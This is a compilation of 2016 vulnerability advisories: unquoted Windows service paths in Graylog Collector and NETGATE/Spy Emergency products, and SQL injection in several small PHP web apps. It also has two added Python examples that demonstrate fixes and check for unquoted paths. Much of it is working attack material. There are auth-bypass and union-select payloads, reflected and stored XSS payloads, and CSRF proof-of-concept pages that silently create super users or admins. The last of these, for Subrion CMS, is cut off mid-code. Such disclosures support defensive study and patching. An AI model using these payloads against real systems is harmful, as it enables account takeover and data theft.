# Exploit Title: Graylog Collector Service Path Privilege Escalation
# Date: 10/14/2016
# Exploit Author: Joey Lane
# Software Link: https://github.com/Graylog2/collector
# Version: 0.4.2
# Tested on: Windows Server 2012 R2
Graylog Collector installs as a service with an unquoted service path. If
the user installs this service in a directory containing a space, this will
create a privilege escalation vulnerability. To properly exploit this
vulnerability, a local attacker can insert an executable file in the path
of the service. Rebooting the system or restarting the service will run
the malicious executable with elevated privileges.
This was tested on version 0.4.2, but may affect other versions as well.
---------------------------------------------------------------------------
C:\>sc qc GraylogCollector
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: GraylogCollector
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\graylog collector\bin\windows\graylog-collector-service-x86.exe //RS//GraylogCollector
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Graylog Collector (GraylogCollector)
DEPENDENCIES : Tcpip
: Afd
SERVICE_START_NAME : LocalSystem
---------------------------------------------------------------------------
EXAMPLE:
Using the BINARY_PATH_NAME listed above as an example, an executable named
"graylog.exe" could be placed in "C:\", and it would be executed as the
Local System user next time the service was restarted.
#########################################################################
# Exploit Title: NETGATE Registry Cleaner Unquoted Service Path Privilege Escalation
# Date: 15/10/2016
# Author: Amir.ght
# Vendor Homepage: http://www.netgate.sk/
# Software Link: http://www.netgate.sk/download/download.php?id=4
# Version : build 16.0.205 (Latest)
# Tested on: Windows 7
##########################################################################
NETGATE Registry Cleaner installs a service with an unquoted service path.
To exploit this vulnerability, a local attacker must place an executable file
in the path of the service. Upon service restart or system reboot, the
malicious code will be run with elevated privileges.
-------------------------------------------
C:\>sc qc NGRegClnSrv
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: NGRegClnSrv
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Registry Cleaner\RegistryCleanerSrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : NETGATE Registry Cleaner Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit Title............... Student Information System (SIS) Auth Bypass
# Google Dork................. N/A
# Date........................ 14/10/2016
# Exploit Author.............. lahilote
# Vendor Homepage............. http://www.sourcecodester.com/php/10902/student-information-system-sis.html
# Software Link............... http://www.sourcecodester.com/sites/default/files/download/Bwire%20Charles/ucc.zip
# Version..................... 0.1
# Tested on................... xampp
# CVE......................... N/A
The audit_list in ucc/admin_login.php
-------------------------------------
----snip----
error_reporting(E_ALL ^ E_DEPRECATED);
if(isset($_POST['submit'])) {
include 'database_config2.php';
$myusername = $_POST['username'];
$mypassword = $_POST['password'];
$query = "SELECT * FROM adminstrator WHERE USERNAME='$myusername' and PASSWORD='$mypassword'";
$result = mysql_query($query);
$count = mysql_num_rows($result);
mysql_close();
----snip----
You can login with username and password: admin' or '1'='1
How to fix
----------
One of the methods to fix and secure such an auth bypass flaw is to use the PHP function mysql_real_escape_string.
It escapes each of the characters \x00, \n, \r, \, ' with a backslash, so the attacker's injected commands become useless.
Example:
error_reporting(E_ALL ^ E_DEPRECATED);
if(isset($_POST['submit'])) {
include 'database_config2.php';
$myusername = mysql_real_escape_string($_POST['username']);
$mypassword = mysql_real_escape_string($_POST['password']);
$query = "SELECT * FROM adminstrator WHERE USERNAME='$myusername' and PASSWORD='$mypassword'";
$result = mysql_query($query);
$count = mysql_num_rows($result);
mysql_close();
Credits
-------
This vulnerability was discovered and researched by lahilote
References
----------
http://www.sourcecodester.com/php/10902/student-information-system-sis.html
http://php.net/manual/en/function.mysql-real-escape-string.php
#########################################################################
# Exploit Title: NETGATE Data Backup Unquoted Service Path Privilege Escalation
# Date: 15/10/2016
# Author: Amir.ght
# Vendor Homepage: http://www.netgate.sk/
# Software Link: http://www.netgate.sk/download/download.php?id=5
# Version : build 3.0.605 (Latest)
# Tested on: Windows 7
##########################################################################
NETGATE Data Backup installs a service with an unquoted service path.
To exploit this vulnerability, a local attacker must place an executable file
in the path of the service. Upon service restart or system reboot, the
malicious code will be run with elevated privileges.
-------------------------------------------
C:\>sc qc NGDatBckpSrv
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: NGDatBckpSrv
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Data Backup\DataBackupSrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : NETGATE Data Backup Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#########################################################################
# Exploit Title: NETGATE AMITI Antivirus Unquoted Service Path Privilege Escalation
# Date: 15/10/2016
# Author: Amir.ght
# Vendor Homepage: http://www.netgate.sk/
# Software Link: http://www.netgate.sk/download/download.php?id=11
# Version : build 23.0.305 (Latest)
# Tested on: Windows 7
##########################################################################
AMITI Antivirus installs two services with an unquoted service path.
To exploit this vulnerability, a local attacker must place an executable file
in the path of the service. Upon service restart or system reboot, the
malicious code will be run with elevated privileges.
-------------------------------------------
C:\>sc qc AmitiAvSrv
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: AmitiAvSrv
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Amiti Antivirus\AmitiAntivirusSrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Amiti Antivirus Engine Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>sc qc AmitiAvHealth
[SC] QueryServiceConfig SUCCESS
----------------------------------------------------
SERVICE_NAME: AmitiAvHealth
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Amiti Antivirus\AmitiAntivirusHealth.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Amiti Antivirus Health Check
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit Title.............. Web Based Alumni Tracking System Multiple Vulnerability
# Google Dork................ N/A
# Date....................... 14/10/2016
# Exploit Author............. lahilote
# Vendor Homepage............ http://www.sourcecodester.com/php/10832/web-based-alumni-tracking-system.html
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/John%20Mark%20Ulep/web-based_alumni_tracking_system.zip
# Version.................... 0.1
# Tested on.................. xampp
# CVE........................ N/A
The audit_list in /admin/print_employed.php
-------------------------------
----snip----
<?php $get_id = $_GET['id'];?>
----snip----
/admin/index.php
----------------
----snip----
$user = $_POST['username'];
$password = $_POST['password'];
$myquery = mysql_query("select * from user where username = '$user' and password = '$password'")or die(mysql_error());
----snip----
Example exploitation
--------------------
http://server/path_to_webapp/admin/print_employed.php?id=-2%27%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12%20from%20user--+
http://server/path_to_webapp/admin/index.php
Login with username and password: admin' or '1'='1
How to fix
----------
A simple method is to use the PHP functions intval and mysql_real_escape_string.
Example: /admin/print_employed.php
<?php $get_id = intval($_GET['id']);?>
Example: /admin/index.php
$user = mysql_real_escape_string($_POST['username']);
$password = mysql_real_escape_string($_POST['password']);
$myquery = mysql_query("select * from user where username = '$user' and password = '$password'")or die(mysql_error());
Credits
-------
This vulnerability was discovered and researched by lahilote
References
----------
http://www.sourcecodester.com/php/10832/web-based-alumni-tracking-system.html
http://php.net/manual/en/function.intval.php
http://php.net/manual/en/function.mysql-real-escape-string.php
# Exploit Title.............. Simple Dynamic Web SQL Injection
# Google Dork................ N/A
# Date....................... 14/10/2016
# Exploit Author............. lahilote
# Vendor Homepage............ http://www.sourcecodester.com/php/10888/simple-dynamic-web-site.html
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/Chinthaka%20Deshapriya/dynamic_web_page.zip
# Version.................... 0.1
# Tested on.................. xampp
# CVE........................ N/A
The audit_list in /page.php
----snip----
$prodID = $_GET['prodid'];
if(!empty($prodID)){
$sqlSelectSpecProd = mysql_query("select * from page where id = '$prodID'") or die(mysql_error());
$getProdInfo = mysql_fetch_array($sqlSelectSpecProd);
$ptitle = $getProdInfo["title"];
$pdes = $getProdInfo["description"];
$pimg = $getProdInfo["imgUrl"];
}
----snip----
Example exploitation
--------------------
http://server/path_to_webapp/page.php?prodid=-3%27%20union%20select%201,2,@@version,4--+
How to fix
----------
A simple method is to use the PHP function intval.
For example:
$prodID = intval($_GET['prodid']);
if(!empty($prodID)){
$sqlSelectSpecProd = mysql_query("select * from page where id = '$prodID'") or die(mysql_error());
$getProdInfo = mysql_fetch_array($sqlSelectSpecProd);
$ptitle = $getProdInfo["title"];
$pdes = $getProdInfo["description"];
$pimg = $getProdInfo["imgUrl"];
}
Credits
-------
This vulnerability was discovered and researched by lahilote
References
----------
http://www.sourcecodester.com/php/10888/simple-dynamic-web-site.html
http://php.net/manual/en/function.intval.php
# Exploit Title.............. Learning Management System Auth Bypass
# Google Dork................ N/A
# Date....................... 14/10/2016
# Exploit Author............. lahilote
# Vendor Homepage............ http://www.sourcecodester.com/php/7339/learning-management-system.html
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/jkev/lms.zip
# Version.................... 0.1
# Tested on.................. xampp
# CVE........................ N/A
The audit_list in lms/login.php
-------------------------------
----snip----
$username = $_POST['username'];
$password = $_POST['password'];
/* student */
$query = "SELECT * FROM student WHERE username='$username' AND password='$password'";
$result = mysql_query($query)or die(mysql_error());
$row = mysql_fetch_array($result);
$num_row = mysql_num_rows($result);
/* teacher */
$query_teacher = mysql_query("SELECT * FROM teacher WHERE username='$username' AND password='$password'")or die(mysql_error());
$num_row_teacher = mysql_num_rows($query_teacher);
$row_teahcer = mysql_fetch_array($query_teacher);
if( $num_row > 0 ) {
----snip----
lms/admin/login.php
-------------------
----snip----
$username = $_POST['username'];
$password = $_POST['password'];
$query = mysql_query("SELECT * FROM users WHERE username='$username' AND password='$password'")or die(mysql_error());
$count = mysql_num_rows($query);
$row = mysql_fetch_array($query);
----snip----
You can login with username and password: admin' or '1'='1
How to fix
----------
One of the methods to fix and secure such an auth bypass flaw is to use the PHP function mysql_real_escape_string.
It escapes each of the characters \x00, \n, \r, \, ' with a backslash, so the attacker's injected commands become useless.
Example: lms/login.php
$username = mysql_real_escape_string($_POST['username']);
$password = mysql_real_escape_string($_POST['password']);
/* student */
$query = "SELECT * FROM student WHERE username='$username' AND password='$password'";
$result = mysql_query($query)or die(mysql_error());
$row = mysql_fetch_array($result);
$num_row = mysql_num_rows($result);
/* teacher */
$query_teacher = mysql_query("SELECT * FROM teacher WHERE username='$username' AND password='$password'")or die(mysql_error());
$num_row_teacher = mysql_num_rows($query_teacher);
$row_teahcer = mysql_fetch_array($query_teacher);
if( $num_row > 0 ) {
Example: lms/admin/login.php
$username = mysql_real_escape_string($_POST['username']);
$password = mysql_real_escape_string($_POST['password']);
$query = mysql_query("SELECT * FROM users WHERE username='$username' AND password='$password'")or die(mysql_error());
$count = mysql_num_rows($query);
$row = mysql_fetch_array($query);
Credits
-------
This vulnerability was discovered and researched by lahilote
References
----------
http://www.sourcecodester.com/php/7339/learning-management-system.html
http://php.net/manual/en/function.mysql-real-escape-string.php
# Exploit Title.............. Fashion Shopping Cart SQL Injection
# Google Dork................ N/A
# Date....................... 14/10/2016
# Exploit Author............. lahilote
# Vendor Homepage............ http://www.sourcecodester.com/node/10435
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/aniketsmarty/online_shopping.zip
# Version.................... 0.1
# Tested on.................. xampp
# CVE........................ N/A
The audit_list in /admin/dd.php
-------------------------------
----snip----
$q=$_GET["q"];
$sql="SELECT * FROM subcategory WHERE cat_id ='$q'";
----snip----
Example exploitation
--------------------
http://server/path_to_webapp/admin/dd.php?q=-1%27%20union%20select%201,version()--+
How to fix
----------
A simple method is to use the PHP function intval.
For example:
$q=intval($_GET["q"]);
$sql="SELECT * FROM subcategory WHERE cat_id ='$q'";
Credits
-------
This vulnerability was discovered and researched by lahilote
References
----------
http://www.sourcecodester.com/node/10435
http://php.net/manual/en/function.intval.php
# Exploit Title.............. Health Record System Auth Bypass
# Google Dork................ N/A
# Date....................... 14/10/2016
# Exploit Author............. lahilote
# Vendor Homepage............ http://www.sourcecodester.com/node/10430
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/Jesutoyeboluwatife/vital.zip
# Version.................... 0.1
# Tested on.................. xampp
# CVE........................ N/A
The audit_list in vital/signin.php
-------------------------------
----snip----
if (isset($_POST['submit'])){
$lga_id=$_POST['lgaid'];
$pw=$_POST['pwd'];
$_SESSION['username'] = $lga_id;
$sql=mysql_query("SELECT * FROM admin WHERE lga_id='$lga_id' AND password='$pw' ");
----snip----
You can login with username and password: admin' or '1'='1
How to fix
----------
One of the methods to fix and secure such an auth bypass flaw is to use the PHP function mysql_real_escape_string.
It escapes each of the characters \x00, \n, \r, \, ' with a backslash, so the attacker's injected commands become useless.
Example:
if (isset($_POST['submit'])){
$lga_id=mysql_real_escape_string($_POST['lgaid']);
$pw=mysql_real_escape_string($_POST['pwd']);
$_SESSION['username'] = $lga_id;
$sql=mysql_query("SELECT * FROM admin WHERE lga_id='$lga_id' AND password='$pw' ");
Credits
-------
This vulnerability was discovered and researched by lahilote
References
----------
http://www.sourcecodester.com/node/10430
http://php.net/manual/en/function.mysql-real-escape-string.php
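The auth-bypass and integer-id fixes from the lahilote advisories above (SIS, Alumni Tracking, Simple Dynamic Web, LMS, Fashion Shopping Cart and Health Record System), worked through as an added example that is not the advisories' PHP: the same query shapes run against an in-memory SQLite table with string interpolation and with bound parameters, and `php_intval` is an assumed approximation of PHP's intval(). Bound parameters stand in for the mysql_real_escape_string fix because the mysql_* extension those fixes rely on was removed in PHP 7.

```python
"""Auth bypass and integer-id coercion, added example (not the advisories' PHP).

Runs the advisories' query shapes against an in-memory SQLite table, once with
string interpolation (the vulnerable form) and once with bound parameters, and
shows the intval-style fix for the numeric id endpoints. php_intval is an
assumed approximation of PHP's intval(): leading integer, else 0.
"""
import re
import sqlite3

# Payloads quoted in the advisories above.
BYPASS = "admin' or '1'='1"
UNION_ID = "-3' union select 1,2,@@version,4--+"


def make_db():
    """Constructed sample data: one admin row and one page row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE adminstrator (username TEXT, password TEXT)")
    conn.execute("INSERT INTO adminstrator VALUES ('admin', 'constructed-secret')")
    conn.execute("CREATE TABLE page (id INTEGER, title TEXT)")
    conn.execute("INSERT INTO page VALUES (1, 'Home')")
    return conn


def login_interpolated(conn, username, password):
    """Mirrors the vulnerable PHP: inputs are spliced into the SQL text, so
    admin' or '1'='1 turns the WHERE clause into a tautology."""
    query = (f"SELECT * FROM adminstrator WHERE USERNAME='{username}' "
             f"and PASSWORD='{password}'")
    return len(conn.execute(query).fetchall()) > 0


def login_parameterized(conn, username, password):
    """Bound parameters: the quote in the input stays data, never SQL syntax."""
    query = "SELECT * FROM adminstrator WHERE USERNAME=? and PASSWORD=?"
    return len(conn.execute(query, (username, password)).fetchall()) > 0


def php_intval(value):
    """Approximation of PHP intval(): leading optional sign and digits, else 0."""
    m = re.match(r"\s*([+-]?\d+)", str(value))
    return int(m.group(1)) if m else 0


def page_by_id(conn, raw_id):
    """The intval fix from the advisories: the id can only ever be an integer,
    so the union payload collapses to -3 and simply matches nothing."""
    prod_id = php_intval(raw_id)
    if not prod_id:  # mirrors `if(!empty($prodID))`
        return []
    return conn.execute("SELECT title FROM page WHERE id = ?", (prod_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("interpolated, bypass payload :", login_interpolated(db, BYPASS, BYPASS))
    print("parameterized, bypass payload:", login_parameterized(db, BYPASS, BYPASS))
    print("intval of union payload      :", php_intval(UNION_ID))
    print("page lookup with payload     :", page_by_id(db, UNION_ID))
```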
#########################################################################
# Exploit Title: Spy Emergency Unquoted Service Path Privilege Escalation
# Date: 15/10/2016
# Author: Amir.ght
# Vendor Homepage: http://www.spy-emergency.com/
# Software Link: http://www.spy-emergency.com/download/download.php?id=1
# Version : build 23.0.205 (Latest)
# Tested on: Windows 7
##########################################################################
Spy Emergency installs two services with an unquoted service path.
To exploit this vulnerability, a local attacker must place an executable file
in the path of the service. Upon service restart or system reboot, the
malicious code will be run with elevated privileges.
-------------------------------------------
C:\>sc qc SpyEmrgHealth
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SpyEmrgHealth
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Spy Emergency\SpyEmergencyHealth.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Spy Emergency Health Check
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
------------------------------------------------------------------
C:\>sc qc SpyEmrgSrv
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SpyEmrgSrv
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Spy Emergency\SpyEmergencySrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Spy Emergency Engine Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
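A checker for the unquoted service path pattern reported above for Graylog Collector, the NETGATE products and Spy Emergency, added here as an example and not part of any advisory: it parses `sc qc` output (the samples are the Graylog and NETGATE Registry Cleaner entries quoted above plus a constructed, correctly quoted control service), lists the files the Service Control Manager would resolve before the real binary, and emits the `sc config` command that quotes the path. The rule that the image path ends at the first token ending in `.exe` is an assumption of this example.

```python
"""Unquoted service path checker (added example; not from any advisory above).

Parses the text of `sc qc <service>`, flags an unquoted BINARY_PATH_NAME that
contains spaces, lists the files the Service Control Manager may resolve
before the real binary (these are the locations whose write ACLs a defender
must audit), and builds the `sc config` command that quotes the path.
Assumption: the image path ends at the first token ending in ".exe".
"""
import re
from dataclasses import dataclass, field

# Samples: the Graylog Collector and NETGATE Registry Cleaner entries quoted
# above, plus a constructed, correctly quoted service as a control case.
SC_QC_SAMPLES = [
    r"""SERVICE_NAME: GraylogCollector
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
BINARY_PATH_NAME : C:\graylog collector\bin\windows\graylog-collector-service-x86.exe //RS//GraylogCollector
SERVICE_START_NAME : LocalSystem""",
    r"""SERVICE_NAME: NGRegClnSrv
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
BINARY_PATH_NAME : C:\Program Files\NETGATE\Registry Cleaner\RegistryCleanerSrv.exe
SERVICE_START_NAME : LocalSystem""",
    r"""SERVICE_NAME: QuotedExampleSvc
BINARY_PATH_NAME : "C:\Program Files\Example Vendor\svc.exe" -run
SERVICE_START_NAME : LocalSystem""",
]


@dataclass
class ServiceFinding:
    name: str
    binary_path: str
    start_name: str
    unquoted: bool = False
    resolution_candidates: list = field(default_factory=list)
    fix_command: str = ""


def parse_sc_qc(text):
    """Collect the `KEY : value` lines of `sc qc` output into a dict."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]{2,})\s*:\s*(.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def split_image_and_args(command_line):
    """Separate executable from arguments in an unquoted command line.
    Heuristic (assumption): the image ends at the first token ending in .exe."""
    tokens = command_line.split(" ")
    for i, tok in enumerate(tokens):
        if tok.lower().endswith(".exe"):
            return " ".join(tokens[: i + 1]), " ".join(tokens[i + 1:])
    return command_line, ""


def resolution_candidates(image_path):
    """Files CreateProcess tries before the intended one when an unquoted
    path contains spaces: every space-delimited prefix, with .exe appended
    when the prefix carries no extension."""
    parts = image_path.split(" ")
    candidates = []
    for i in range(1, len(parts)):
        prefix = " ".join(parts[:i])
        if not re.search(r"\.[A-Za-z0-9]+$", prefix):
            prefix += ".exe"
        candidates.append(prefix)
    return candidates


def assess(sc_qc_text):
    """Return a ServiceFinding for one `sc qc` output block."""
    f = parse_sc_qc(sc_qc_text)
    svc = ServiceFinding(f.get("SERVICE_NAME", "?"),
                         f.get("BINARY_PATH_NAME", ""),
                         f.get("SERVICE_START_NAME", ""))
    if svc.binary_path.startswith('"'):
        return svc  # quoted: the SCM passes the exact path, nothing to resolve
    image, args = split_image_and_args(svc.binary_path)
    if " " not in image:
        return svc  # no spaces in the image path: no ambiguity
    svc.unquoted = True
    svc.resolution_candidates = resolution_candidates(image)
    # cmd.exe syntax: the space after `binPath=` is required, inner quotes escaped
    quoted = f'\\"{image}\\"' + (f" {args}" if args else "")
    svc.fix_command = f'sc config {svc.name} binPath= "{quoted}"'
    return svc


if __name__ == "__main__":
    for sample in SC_QC_SAMPLES:
        s = assess(sample)
        verdict = "UNQUOTED" if s.unquoted else "ok"
        print(f"{s.name} ({s.start_name}): {verdict}")
        for c in s.resolution_candidates:
            print(f"   would resolve first: {c}")
        if s.fix_command:
            print(f"   fix: {s.fix_command}")
```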
# Exploit Title: PHP Telephone Directory - Multiple Vulnerabilities
# Date: 2016-10-16
# Exploit Author: larrycompress
# Contact: larrycompress@gmail.com
# Type: webapps
# Platform: PHP
# Vendor Homepage: http://www.pagereactions.com/product.php?pku=2
# Software Link: http://www.pagereactions.com/downloads/phptelephonedirectory.zip
---------------------------------------------------------------------------------
POC as follows :
# 0x00 Reflected XSS
---
1.In public search :
http://192.168.1.112/phptelephonedirectory/index.php?key=<svg/onload=alert(1)>
2.In administration web interface (need normal user login) :
http://192.168.1.112/phptelephonedirectory/administration.php?key=<svg/onload=alert(1)>
# 0x01 Stored XSS
---
1.In administration web directory interface (need normal user login) :
http://192.168.1.112/phptelephonedirectory/administration.php
?pageaction=newcontact
&subaction=submit
&id=1
&dtDOBDate=0000-00-00
&pointcode=<script>alert(1)/*
&contacttitle=*/</script>
&firstname=<script>alert(2)</script>
&lastname=<script>alert(3)</script>
&middlename=<script>alert(4)</script>
&DOBdateradio=usenew
&dateday=16
&datemonthnewedit=10
&dateyearnewedit=2015
&employeeID=<script>alert(5)/*
&otherID=*/</script>
&phonenumber1=<script>alert(6)</script>
&internalphonenumber=<script>alert(7)</script>
&phonenumber2=<script>alert(8)</script>
&phonenumber3=<script>alert(9)</script>
&fax=<script>alert(10)</script>
&mobilecell=<script>alert(11)</script>
&email=<script>alert(12)</script>
&alternateemail=<script>alert(13)</script>
&chat=<script>alert(14)</script>
&website=<script>alert(15)</script>
&socialmedia1=<script>alert(16)</script>
&socialmedia2=<script>alert(17)</script>
&socialmedia3=<script>alert(18)</script>
&contactposition=<script>alert(19)</script>
&company=<script>alert(20)</script>
&qualifications=<script>alert(21)</script>
&departmentnewedit=
&buildingroom=<script>alert(22)</script>
&address=<script>alert(23)</script>
&city=<script>alert(24)</script>
&suburb=<script>alert(25)</script>
&tdstate=<script>alert(26)</script>
&zippostcode=<script>alert(27)/*
&country=*/</script><script>alert(28)</script>
&description=<script>alert(29)</script>
&recordstatus=active
2.In administration web department interface (need normal user login) :
http://192.168.1.112/phptelephonedirectory/administration.php?pageaction=newdepartment&subaction=submit&departmentname=</select><svg/onload=alert(1)><select>
# 0x02 CSRF (add Super user)
---
In http://192.168.1.103/csrf.html :
<!DOCTYPE html>
<html>
<body>
<form action="http://192.168.1.112/phptelephonedirectory/administration.php" method="POST">
<input name="pageaction" value="saveuser" type="hidden" />
<input name="subaction" value="submit" type="hidden" />
<input name="username" value="larry_csrf" type="hidden" />
<input name="password" value="larry_csrf" type="hidden" />
<input name="userfullname" value="larry_csrf" type="hidden" />
<input name="accesslevel" value="Super" type="hidden" />
<input name="userstatus" value="active" type="hidden" />
<input name="mysubmit" value="submit" type="submit" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
* Thanks to Besim *
# Exploit Title: Subrion CMS 4.0.5 - CSRF Bypass to Persistent XSS and Add-Admin
# Date: 15-10-2016
# Software Link: http://www.subrion.org/download/
# Vendor: http://www.subrion.org
# Google Dork: "Powered by Subrion CMS"
# Exploit Author: Ahsan Tahir
# Contact: https://twitter.com/AhsanTahirAT | https://facebook.com/ahsantahiratofficial
# Website: www.ahsantahir.net
# Category: webapps
# Version: 4.0.5
# Tested on: [Kali Linux 2.0 | Windows 8.1]
# Email: mrahsan1337@gmail.com
[+] CSRF bypass to Persistent XSS
1. Description
There is an anti-CSRF token when adding a post in Subrion CMS v4.0.5, passed in the parameter '__st', but it can be bypassed by
submitting any value with the same number of characters as the token (e.g. XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX). The CSRF protection is
then bypassed, meaning that if we craft a malicious HTML web page and trick the admin/victim into visiting it, a blog post will be
created with a tag like "</title><script>alert(document.domain);</script>", and the XSS is then executed
here: http://localhost/[SubrionPATH]/tag/title-script-alert-document-domain-script/
2. Proof of Concept (CSRF to Persistent XSS)
Log in to your Subrion CMS as admin, visit a web page containing the HTML code below and click "Submit request": a new post named
"Hacked by Ahsan" will be created with the tag "</title><script>alert(document.domain);</script>", meaning that the
CSRF was exploited successfully!
The XSS will execute here: http://localhost/[SubrionPATH]/tag/title-script-alert-document-domain-script/
[!] PoC Code:
<html>
<!-- CSRF PoC -->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/subi/admin/blog/add/", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------292766351574");
xhr.withCredentials = true;
var body = "-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"__st\"\r\n" +
"\r\n" +
"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"title\"\r\n" +
"\r\n" +
"Hacked by Ahsan Tahir\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"alias\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"body\"\r\n" +
"\r\n" +
"\x3cp\x3eHacked by Ahsan Tahir\x3c/p\x3e\r\n" +
"\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"tags\"\r\n" +
"\r\n" +
"\x3c/title\x3e\x3cscript\x3ealert(document.domain);\x3c/script\x3e\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"v[image]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"image\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"owner\"\r\n" +
"\r\n" +
"Administrator (emailofadmin@gmail.com)\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"member_id\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"date_added\"\r\n" +
"\r\n" +
"2016-10-15 04:41\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"status\"\r\n" +
"\r\n" +
"active\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"save\"\r\n" +
"\r\n" +
"Add\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"goto\"\r\n" +
"\r\n" +
"list\r\n" +
"-----------------------------292766351574--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
----------------------------------------------------------------------------------------------------------------------
[+] Add-Admin CSRF
1. Description
There is an anti-CSRF token when adding an admin in Subrion CMS v4.0.5, passed in the parameter '__st', but it can be bypassed by
submitting any value with the same number of characters as the token (e.g. XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX). The CSRF protection is
then bypassed, meaning that if we craft a malicious HTML web page and trick the admin/victim into visiting it, a new admin will be
created with an email address controlled by the attacker, who then has full administrative control over the
Subrion CMS blog!
2. Proof of Concept
Log in to your Subrion CMS as admin, visit a web page containing the HTML code below and click "Submit request": a new admin named
"Haxor" will be created with the email "ahsan@ahsan.py", meaning that the CSRF was exploited successfully, and the attacker
now has full control over the Subrion blog!
[!] PoC Code:
<html>
<!-- CSRF PoC -->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/subi/admin/members/add/", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------2573679013209");
xhr.withCredentials = true;
var body = "-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"__st\"\r\n" +
"\r\n" +
"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"username\"\r\n" +
"\r\n" +
"haxor\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"fullname\"\r\n" +
"\r\n" +
"Craxor\r\n" +
"-----------------------------2573679013209\r\n" +
